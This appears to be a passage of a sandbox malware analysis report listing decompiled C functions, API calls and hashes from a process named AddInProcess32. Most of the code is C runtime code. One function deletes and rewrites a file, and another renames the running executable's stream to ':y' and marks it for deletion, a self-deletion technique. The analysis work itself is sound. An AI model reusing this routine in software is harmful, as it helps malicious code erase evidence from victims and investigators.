                                              • SetHandleCount.KERNEL32 ref: 00407A63
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                                              • String ID:
                                              • API String ID: 1318386821-0
                                              • Opcode ID: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                              • Instruction ID: 69dbfb245cb0b330f8ea7ce656b2dbe2117018d0c8ec9728b90aae803ce677d5
                                              • Opcode Fuzzy Hash: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                              • Instruction Fuzzy Hash: 24610AB1E4C7418ED7108B78C844B567BA0AF52334F29837AD4A5BB2E1D73CB845CB1A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 79%
                                              			E00405CC9(void* __ecx, void* __eflags, int _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				char _v21;
                                              				char _v22;
                                              				struct _cpinfo _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t53;
                                              				int _t56;
                                              				signed char _t59;
                                              				intOrPtr _t61;
                                              				short* _t62;
                                              				int _t65;
                                              				signed int _t66;
                                              				signed char* _t76;
                                              				signed int _t79;
                                              				intOrPtr _t81;
                                              				void* _t82;
                                              				signed int _t85;
                                              				intOrPtr* _t86;
                                              				int _t90;
                                              				signed char _t91;
                                              				signed int _t92;
                                              				int _t93;
                                              				int _t97;
                                              				signed int _t99;
                                              				signed int _t104;
                                              				void* _t108;
                                              				intOrPtr* _t110;
                                              				signed int _t112;
                                              
                                              				_t53 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t53 ^ _t112;
                                              				_t81 = _a8;
                                              				_t97 = E00405C4F(_a4);
                                              				_t117 = _t97;
                                              				_a4 = _t97;
                                              				if(_t97 != 0) {
                                              					_v32 = 0;
                                              					_t56 = 0;
                                              					__eflags = 0;
                                              					while(1) {
                                              						__eflags =  *((intOrPtr*)(_t56 + 0x4136d8)) - _t97;
                                              						if( *((intOrPtr*)(_t56 + 0x4136d8)) == _t97) {
                                              							break;
                                              						}
                                              						_v32 = _v32 + 1;
                                              						_t56 = _t56 + 0x30;
                                              						__eflags = _t56 - 0xf0;
                                              						if(_t56 < 0xf0) {
                                              							continue;
                                              						} else {
                                              							__eflags = _t97 - 0xfde8;
                                              							if(_t97 == 0xfde8) {
                                              								L35:
                                              								_t65 = _t56 | 0xffffffff;
                                              								__eflags = _t65;
                                              							} else {
                                              								__eflags = _t97 - 0xfde9;
                                              								if(_t97 == 0xfde9) {
                                              									goto L35;
                                              								} else {
                                              									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
                                              									__eflags = _t56;
                                              									if(_t56 == 0) {
                                              										goto L35;
                                              									} else {
                                              										_t56 = GetCPInfo(_t97,  &_v28);
                                              										__eflags = _t56;
                                              										if(_t56 == 0) {
                                              											__eflags =  *0x4144b0;
                                              											if(__eflags != 0) {
                                              												goto L1;
                                              											} else {
                                              												goto L35;
                                              											}
                                              										} else {
                                              											E00409280(_t97, _t81 + 0x1c, 0, 0x101);
                                              											__eflags = _v28 - 1;
                                              											 *(_t81 + 4) = _t97;
                                              											 *((intOrPtr*)(_t81 + 0xc)) = 0;
                                              											if(_v28 <= 1) {
                                              												 *((intOrPtr*)(_t81 + 8)) = 0;
                                              											} else {
                                              												__eflags = _v22;
                                              												if(_v22 != 0) {
                                              													_t110 =  &_v21;
                                              													while(1) {
                                              														_t91 =  *_t110;
                                              														__eflags = _t91;
                                              														if(_t91 == 0) {
                                              															goto L29;
                                              														}
                                              														_t79 =  *(_t110 - 1) & 0x000000ff;
                                              														_t92 = _t91 & 0x000000ff;
                                              														while(1) {
                                              															__eflags = _t79 - _t92;
                                              															if(_t79 > _t92) {
                                              																break;
                                              															}
                                              															 *(_t81 + _t79 + 0x1d) =  *(_t81 + _t79 + 0x1d) | 0x00000004;
                                              															_t79 = _t79 + 1;
                                              															__eflags = _t79;
                                              														}
                                              														_t110 = _t110 + 2;
                                              														__eflags =  *(_t110 - 1);
                                              														if( *(_t110 - 1) != 0) {
                                              															continue;
                                              														}
                                              														goto L29;
                                              													}
                                              												}
                                              												L29:
                                              												_t76 = _t81 + 0x1e;
                                              												_t90 = 0xfe;
                                              												do {
                                              													 *_t76 =  *_t76 | 0x00000008;
                                              													_t76 =  &(_t76[1]);
                                              													_t90 = _t90 - 1;
                                              													__eflags = _t90;
                                              												} while (_t90 != 0);
                                              												 *((intOrPtr*)(_t81 + 0xc)) = E0040599D( *(_t81 + 4));
                                              												 *((intOrPtr*)(_t81 + 8)) = 1;
                                              											}
                                              											asm("stosd");
                                              											asm("stosd");
                                              											asm("stosd");
                                              											L25:
                                              											E00405A21(_t81);
                                              											goto L2;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L36;
                                              					}
                                              					E00409280(_t97, _t81 + 0x1c, 0, 0x101);
                                              					_t85 = _v32 * 0x30;
                                              					_v36 = 0;
                                              					_t104 = _t85 + 0x4136e8;
                                              					_v32 = _t104;
                                              					while(1) {
                                              						L21:
                                              						__eflags =  *_t104;
                                              						if( *_t104 == 0) {
                                              							break;
                                              						}
                                              						_t59 =  *(_t104 + 1);
                                              						__eflags = _t59;
                                              						if(_t59 != 0) {
                                              							_t99 =  *_t104 & 0x000000ff;
                                              							_t66 = _t59 & 0x000000ff;
                                              							while(1) {
                                              								__eflags = _t99 - _t66;
                                              								if(_t99 > _t66) {
                                              									break;
                                              								}
                                              								 *(_t81 + _t99 + 0x1d) =  *(_t81 + _t99 + 0x1d) |  *(_v36 + 0x4136d4);
                                              								_t66 =  *(_t104 + 1) & 0x000000ff;
                                              								_t99 = _t99 + 1;
                                              								__eflags = _t99;
                                              							}
                                              							_t97 = _a4;
                                              							_t104 = _t104 + 2;
                                              							__eflags = _t104;
                                              							continue;
                                              						}
                                              						break;
                                              					}
                                              					_v36 = _v36 + 1;
                                              					_t104 = _v32 + 8;
                                              					__eflags = _v36 - 4;
                                              					_v32 = _t104;
                                              					if(_v36 < 4) {
                                              						goto L21;
                                              					}
                                              					 *(_t81 + 4) = _t97;
                                              					 *((intOrPtr*)(_t81 + 8)) = 1;
                                              					_t61 = E0040599D(_t97);
                                              					 *((intOrPtr*)(_t81 + 0xc)) = _t61;
                                              					_t62 = _t81 + 0x10;
                                              					_t86 = _t85 + 0x4136dc;
                                              					_t93 = 6;
                                              					do {
                                              						 *_t62 =  *_t86;
                                              						_t86 = _t86 + 2;
                                              						_t62 = _t62 + 2;
                                              						_t93 = _t93 - 1;
                                              						__eflags = _t93;
                                              					} while (_t93 != 0);
                                              					goto L25;
                                              				} else {
                                              					L1:
                                              					E004059CC(_t81, _t117);
                                              					L2:
                                              					_t65 = 0;
                                              				}
                                              				L36:
                                              				_pop(_t108);
                                              				_pop(_t82);
                                              				E0040318A(_t65, _t82, _v8 ^ _t112, _t108);
                                              				return _t65;
                                              			}




































                                              0x00405ccf
                                              0x00405cd6
                                              0x00405cda
                                              0x00405ce7
                                              0x00405ceb
                                              0x00405ced
                                              0x00405cf0
                                              0x00405d00
                                              0x00405d03
                                              0x00405d03
                                              0x00405d05
                                              0x00405d05
                                              0x00405d0b
                                              0x00000000
                                              0x00000000
                                              0x00405d11
                                              0x00405d14
                                              0x00405d17
                                              0x00405d1c
                                              0x00000000
                                              0x00405d1e
                                              0x00405d1e
                                              0x00405d24
                                              0x00405e90
                                              0x00405e90
                                              0x00405e90
                                              0x00405d2a
                                              0x00405d2a
                                              0x00405d30
                                              0x00000000
                                              0x00405d36
                                              0x00405d3a
                                              0x00405d40
                                              0x00405d42
                                              0x00000000
                                              0x00405d48
                                              0x00405d4d
                                              0x00405d53
                                              0x00405d55
                                              0x00405e84
                                              0x00405e8a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405d5b
                                              0x00405d65
                                              0x00405d70
                                              0x00405d73
                                              0x00405d76
                                              0x00405d79
                                              0x00405e77
                                              0x00405d7f
                                              0x00405d7f
                                              0x00405d83
                                              0x00405d89
                                              0x00405d8c
                                              0x00405d8c
                                              0x00405d8e
                                              0x00405d90
                                              0x00000000
                                              0x00000000
                                              0x00405d96
                                              0x00405d9a
                                              0x00405e48
                                              0x00405e48
                                              0x00405e4a
                                              0x00000000
                                              0x00000000
                                              0x00405e42
                                              0x00405e47
                                              0x00405e47
                                              0x00405e47
                                              0x00405e4d
                                              0x00405e4e
                                              0x00405e52
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405e52
                                              0x00405d8c
                                              0x00405e58
                                              0x00405e58
                                              0x00405e5b
                                              0x00405e60
                                              0x00405e60
                                              0x00405e63
                                              0x00405e64
                                              0x00405e64
                                              0x00405e64
                                              0x00405e6f
                                              0x00405e72
                                              0x00405e72
                                              0x00405e7f
                                              0x00405e80
                                              0x00405e81
                                              0x00405e36
                                              0x00405e38
                                              0x00000000
                                              0x00405e38
                                              0x00405d55
                                              0x00405d42
                                              0x00405d30
                                              0x00405d24
                                              0x00000000
                                              0x00405d1c
                                              0x00405dac
                                              0x00405db7
                                              0x00405dba
                                              0x00405dbd
                                              0x00405dc3
                                              0x00405df2
                                              0x00405df2
                                              0x00405df2
                                              0x00405df5
                                              0x00000000
                                              0x00000000
                                              0x00405dc8
                                              0x00405dcb
                                              0x00405dcd
                                              0x00405dcf
                                              0x00405dd2
                                              0x00405de9
                                              0x00405de9
                                              0x00405deb
                                              0x00000000
                                              0x00000000
                                              0x00405de0
                                              0x00405de4
                                              0x00405de8
                                              0x00405de8
                                              0x00405de8
                                              0x00405ded
                                              0x00405df1
                                              0x00405df1
                                              0x00000000
                                              0x00405df1
                                              0x00000000
                                              0x00405dcd
                                              0x00405dfa
                                              0x00405dfd
                                              0x00405e00
                                              0x00405e04
                                              0x00405e07
                                              0x00000000
                                              0x00000000
                                              0x00405e0b
                                              0x00405e0e
                                              0x00405e15
                                              0x00405e1c
                                              0x00405e1f
                                              0x00405e22
                                              0x00405e28
                                              0x00405e29
                                              0x00405e2d
                                              0x00405e30
                                              0x00405e32
                                              0x00405e33
                                              0x00405e33
                                              0x00405e33
                                              0x00000000
                                              0x00405cf2
                                              0x00405cf2
                                              0x00405cf4
                                              0x00405cf9
                                              0x00405cf9
                                              0x00405cf9
                                              0x00405e93
                                              0x00405e97
                                              0x00405e9a
                                              0x00405e9b
                                              0x00405ea1

                                              APIs
                                              • getSystemCP.LIBCMT ref: 00405CE2
                                                • Part of subcall function 00405C4F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405C5C
                                                • Part of subcall function 00405C4F: GetOEMCP.KERNEL32(00000000), ref: 00405C76
                                              • setSBCS.LIBCMT ref: 00405CF4
                                                • Part of subcall function 004059CC: _memset.LIBCMT ref: 004059DF
                                              • IsValidCodePage.KERNEL32(-00000030), ref: 00405D3A
                                              • GetCPInfo.KERNEL32(00000000,?), ref: 00405D4D
                                              • _memset.LIBCMT ref: 00405D65
                                              • setSBUpLow.LIBCMT ref: 00405E38
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                              • String ID:
                                              • API String ID: 2658552758-0
                                              • Opcode ID: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                              • Instruction ID: d2136bea0d1a2f065ec75707fb5b56249d955542dcdf0261cb1fe3d024273208
                                              • Opcode Fuzzy Hash: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                              • Instruction Fuzzy Hash: BC5100719046549BDB258F65C8846BFBBB5EF04304F14847BD886BF282C63C8A42CFD8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E02B53B3F(void* __ebx, WCHAR* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _v8;
                                              				void _v32;
                                              				long _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				long _v48;
                                              				WCHAR* _v52;
                                              				signed int _t27;
                                              				void* _t30;
                                              				void* _t52;
                                              				signed int _t59;
                                              				signed int _t71;
                                              				long _t72;
                                              				void* _t75;
                                              				WCHAR* _t76;
                                              				void* _t77;
                                              				signed int _t78;
                                              
                                              				_t27 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t27 ^ _t78;
                                              				_t75 = __edx;
                                              				_v52 = __ecx;
                                              				_v40 = _v40 & 0;
                                              				_v44 = _v44 & 0;
                                              				_v36 = 0;
                                              				_t30 = E02B529B2(__ecx,  &_v40,  &_v44);
                                              				_t52 = _v40;
                                              				if(_t30 != 0) {
                                              					if(( *__edx | __edx[1]) != 0 || (__edx[2] | __edx[3]) != 0) {
                                              						L4:
                                              						_t59 = 6;
                                              						memcpy( &_v32, _t75, _t59 << 2);
                                              						_t71 = _v44;
                                              						if(E02B51CC7(_t52, _t52, _t71, _t71, _t75, _t85,  &_v32) == 0) {
                                              							L11:
                                              						} else {
                                              							_t76 = _v52;
                                              							_t72 = _t71 - 8;
                                              							DeleteFileW(_t76);
                                              							_t77 = CreateFileW(_t76, 0x10000000, 0, 0, 2, 0, 0);
                                              							if(_t77 == 0xffffffff) {
                                              								goto L11;
                                              							} else {
                                              								_v48 = _v48 & 0x00000000;
                                              								if(WriteFile(_t77, _t52, _t72,  &_v48, 0) == 0 || _v48 != _t72) {
                                              									CloseHandle(_t77);
                                              									goto L11;
                                              								} else {
                                              									CloseHandle(_t77);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t85 = __edx[4] | __edx[5];
                                              						if((__edx[4] | __edx[5]) != 0) {
                                              							goto L4;
                                              						}
                                              					}
                                              				}
                                              				if(_t52 != 0) {
                                              					HeapFree(GetProcessHeap(), 0, _t52);
                                              				}
                                              				return E02B53C33(_v8 ^ _t78);
                                              			}




















                                              0x02b53b45
                                              0x02b53b4c
                                              0x02b53b53
                                              0x02b53b59
                                              0x02b53b61
                                              0x02b53b64
                                              0x02b53b6a
                                              0x02b53b6d
                                              0x02b53b72
                                              0x02b53b78
                                              0x02b53b83
                                              0x02b53b95
                                              0x02b53b97
                                              0x02b53b9b
                                              0x02b53b9d
                                              0x02b53bb0
                                              0x02b53c09
                                              0x02b53bb2
                                              0x02b53bb2
                                              0x02b53bb5
                                              0x02b53bb9
                                              0x02b53bd3
                                              0x02b53bd8
                                              0x00000000
                                              0x02b53bda
                                              0x02b53bda
                                              0x02b53bef
                                              0x02b53c03
                                              0x00000000
                                              0x02b53bf6
                                              0x02b53bf7
                                              0x00000000
                                              0x02b53bf7
                                              0x02b53bef
                                              0x02b53bd8
                                              0x02b53b8d
                                              0x02b53b90
                                              0x02b53b93
                                              0x00000000
                                              0x00000000
                                              0x02b53b93
                                              0x02b53b83
                                              0x02b53c0e
                                              0x02b53c1a
                                              0x02b53c1a
                                              0x02b53c32

                                              APIs
                                                • Part of subcall function 02B529B2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
                                                • Part of subcall function 02B529B2: GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
                                                • Part of subcall function 02B529B2: CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE
                                              • DeleteFileW.KERNEL32(?,0000014F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B512AA), ref: 02B53BB9
                                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B53BCD
                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B53BE7
                                              • CloseHandle.KERNEL32(00000000), ref: 02B53BF7
                                              • CloseHandle.KERNEL32(00000000), ref: 02B53C03
                                              • GetProcessHeap.KERNEL32(00000000,?,0000014F,00000000,?), ref: 02B53C13
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B512AA,?,00000000), ref: 02B53C1A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$CloseHandle$CreateHeap$DeleteFreeProcessSizeWrite
                                              • String ID:
                                              • API String ID: 4205881660-0
                                              • Opcode ID: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
                                              • Instruction ID: 8118c94e3ea83e338effb02e91c85935fc12eebfcfe8035b735b4269fc43f21c
                                              • Opcode Fuzzy Hash: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
                                              • Instruction Fuzzy Hash: 36318F32E00328AFDB11DF68D844BEEB7F9EF48361F144599E915EB240CB30A9458B64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E02B52D50(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				short _v528;
                                              				char _v548;
                                              				intOrPtr _v552;
                                              				char _v560;
                                              				char _v561;
                                              				signed int _t14;
                                              				intOrPtr _t24;
                                              				char* _t28;
                                              				void* _t48;
                                              				signed int _t49;
                                              
                                              				_t14 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t14 ^ _t49;
                                              				E02B52CE7(E02B52CE7(_t14 ^ _t49,  &_v560, 0x20),  &_v561, 1);
                                              				GetModuleFileNameW(0,  &_v528, 0x104);
                                              				_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0);
                                              				if(_t48 != 0xffffffff) {
                                              					_t24 = 4;
                                              					_v552 = _t24;
                                              					E02B52CC6( &_v548, L":y", _t24);
                                              					_t28 =  &_v560;
                                              					__imp__SetFileInformationByHandle(_t48, 3, _t28, _v552 + 0x10);
                                              					if(_t28 == 0) {
                                              						L4:
                                              						CloseHandle(_t48);
                                              					} else {
                                              						CloseHandle(_t48);
                                              						_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0);
                                              						if(_t48 != 0xffffffff) {
                                              							_v561 = 1;
                                              							__imp__SetFileInformationByHandle(_t48, 4,  &_v561, 1);
                                              							goto L4;
                                              						}
                                              					}
                                              				}
                                              				return E02B53C33(_v8 ^ _t49);
                                              			}














                                              0x02b52d59
                                              0x02b52d60
                                              0x02b52d7f
                                              0x02b52d93
                                              0x02b52db5
                                              0x02b52dba
                                              0x02b52dc2
                                              0x02b52dc9
                                              0x02b52dd5
                                              0x02b52de7
                                              0x02b52df1
                                              0x02b52e01
                                              0x02b52e46
                                              0x02b52e47
                                              0x02b52e03
                                              0x02b52e04
                                              0x02b52e24
                                              0x02b52e29
                                              0x02b52e33
                                              0x02b52e3e
                                              0x00000000
                                              0x02b52e44
                                              0x02b52e29
                                              0x02b52e01
                                              0x02b52e5b

                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
                                              • CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
                                              • SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52E04
                                              • CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
                                              • SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52E47
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$Handle$CloseCreateInformation$ModuleName
                                              • String ID:
                                              • API String ID: 4136099801-0
                                              • Opcode ID: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
                                              • Instruction ID: 451fee0f2823fa6e798d77c0a79a1ad60c90258088eab8019a44a33cff32ae2a
                                              • Opcode Fuzzy Hash: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
                                              • Instruction Fuzzy Hash: 2521F8B29413287BD7219BA4EC89FEB737CEB48760F1401D5FE05EB1C0DA705E858AA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E00406443(intOrPtr _a4) {
                                              				intOrPtr _v0;
                                              				struct HINSTANCE__* _t8;
                                              				_Unknown_base(*)()* _t9;
                                              				intOrPtr _t11;
                                              				void* _t13;
                                              				struct HINSTANCE__* _t15;
                                              
                                              				if(TlsGetValue( *0x4138c4) == 0) {
                                              					L4:
                                              					_t15 = GetModuleHandleA("KERNEL32.DLL");
                                              					__eflags = _t15;
                                              					if(__eflags == 0) {
                                              						L9:
                                              						return _a4;
                                              					}
                                              					_t8 = E00406360(__eflags);
                                              					__eflags = _t8;
                                              					if(_t8 == 0) {
                                              						goto L9;
                                              					}
                                              					_t9 = GetProcAddress(_t15, "DecodePointer");
                                              					L7:
                                              					if(_t9 != 0) {
                                              						_v0 =  *_t9(_a4);
                                              					}
                                              					goto L9;
                                              				}
                                              				_t11 =  *0x4138c0; // 0xffffffff
                                              				if(_t11 == 0xffffffff) {
                                              					goto L4;
                                              				}
                                              				_push(_t11);
                                              				_t13 =  *(TlsGetValue( *0x4138c4))();
                                              				if(_t13 == 0) {
                                              					goto L4;
                                              				}
                                              				_t9 =  *(_t13 + 0x1fc);
                                              				goto L7;
                                              			}









                                              0x00406454
                                              0x00406477
                                              0x00406482
                                              0x00406484
                                              0x00406486
                                              0x004064ab
                                              0x004064b0
                                              0x004064b0
                                              0x00406488
                                              0x0040648d
                                              0x0040648f
                                              0x00000000
                                              0x00000000
                                              0x00406497
                                              0x0040649d
                                              0x0040649f
                                              0x004064a7
                                              0x004064a7
                                              0x00000000
                                              0x0040649f
                                              0x00406456
                                              0x0040645e
                                              0x00000000
                                              0x00000000
                                              0x00406460
                                              0x00406469
                                              0x0040646d
                                              0x00000000
                                              0x00000000
                                              0x0040646f
                                              0x00000000

                                              APIs
                                              • TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                              • TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                              • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressHandleModuleProc
                                              • String ID: DecodePointer$KERNEL32.DLL
                                              • API String ID: 1929421221-629428536
                                              • Opcode ID: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                              • Instruction ID: c5ae10eeeadb9dadabf971efa998db1139b8a5cf31b1e54eaa7b2be9f0bd982d
                                              • Opcode Fuzzy Hash: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                              • Instruction Fuzzy Hash: 25F03670900612ABC611EB78ED04DAB3BE4AF017A07168572FC45F72F0DB38DD658AAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E004063CC(intOrPtr _a4) {
                                              				intOrPtr _v0;
                                              				struct HINSTANCE__* _t8;
                                              				_Unknown_base(*)()* _t9;
                                              				intOrPtr _t11;
                                              				void* _t13;
                                              				struct HINSTANCE__* _t15;
                                              
                                              				if(TlsGetValue( *0x4138c4) == 0) {
                                              					L4:
                                              					_t15 = GetModuleHandleA("KERNEL32.DLL");
                                              					__eflags = _t15;
                                              					if(__eflags == 0) {
                                              						L9:
                                              						return _a4;
                                              					}
                                              					_t8 = E00406360(__eflags);
                                              					__eflags = _t8;
                                              					if(_t8 == 0) {
                                              						goto L9;
                                              					}
                                              					_t9 = GetProcAddress(_t15, "EncodePointer");
                                              					L7:
                                              					if(_t9 != 0) {
                                              						_v0 =  *_t9(_a4);
                                              					}
                                              					goto L9;
                                              				}
                                              				_t11 =  *0x4138c0; // 0xffffffff
                                              				if(_t11 == 0xffffffff) {
                                              					goto L4;
                                              				}
                                              				_push(_t11);
                                              				_t13 =  *(TlsGetValue( *0x4138c4))();
                                              				if(_t13 == 0) {
                                              					goto L4;
                                              				}
                                              				_t9 =  *(_t13 + 0x1f8);
                                              				goto L7;
                                              			}









                                              0x004063dd
                                              0x00406400
                                              0x0040640b
                                              0x0040640d
                                              0x0040640f
                                              0x00406434
                                              0x00406439
                                              0x00406439
                                              0x00406411
                                              0x00406416
                                              0x00406418
                                              0x00000000
                                              0x00000000
                                              0x00406420
                                              0x00406426
                                              0x00406428
                                              0x00406430
                                              0x00406430
                                              0x00000000
                                              0x00406428
                                              0x004063df
                                              0x004063e7
                                              0x00000000
                                              0x00000000
                                              0x004063e9
                                              0x004063f2
                                              0x004063f6
                                              0x00000000
                                              0x00000000
                                              0x004063f8
                                              0x00000000

                                              APIs
                                              • TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                              • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressHandleModuleProc
                                              • String ID: EncodePointer$KERNEL32.DLL
                                              • API String ID: 1929421221-3682587211
                                              • Opcode ID: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                              • Instruction ID: cf491b8ffedcf847512659abc69032a8f38a6fac2648f49244538ea113319bae
                                              • Opcode Fuzzy Hash: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                              • Instruction Fuzzy Hash: D9F0BB30901122ABD7116B6CDD00ADB3BD49F007547168072FC05F32F1DB38CC568AAD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0040906B(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				signed int _v20;
                                              				signed int _t50;
                                              				intOrPtr _t55;
                                              				int _t56;
                                              				signed short* _t57;
                                              				short* _t58;
                                              				int _t63;
                                              				char* _t69;
                                              
                                              				_t69 = _a8;
                                              				if(_t69 == 0 || _a12 == 0) {
                                              					L5:
                                              					return 0;
                                              				} else {
                                              					if( *_t69 != 0) {
                                              						E004032D9( &_v20, _a16);
                                              						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                              							if(E00409195( *_t69 & 0x000000ff,  &_v20) == 0) {
                                              								_t40 = _v20 + 4; // 0x840ffff8
                                              								_t50 = MultiByteToWideChar( *_t40, 9, _t69, 1, _a4, 0 | _a4 != 0x00000000);
                                              								if(_t50 != 0) {
                                              									L10:
                                              									if(_v8 != 0) {
                                              										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                              									}
                                              									return 1;
                                              								}
                                              								L21:
                                              								E00403CE9();
                                              								 *_t50 = 0x2a;
                                              								if(_v8 != 0) {
                                              									_t50 = _v12;
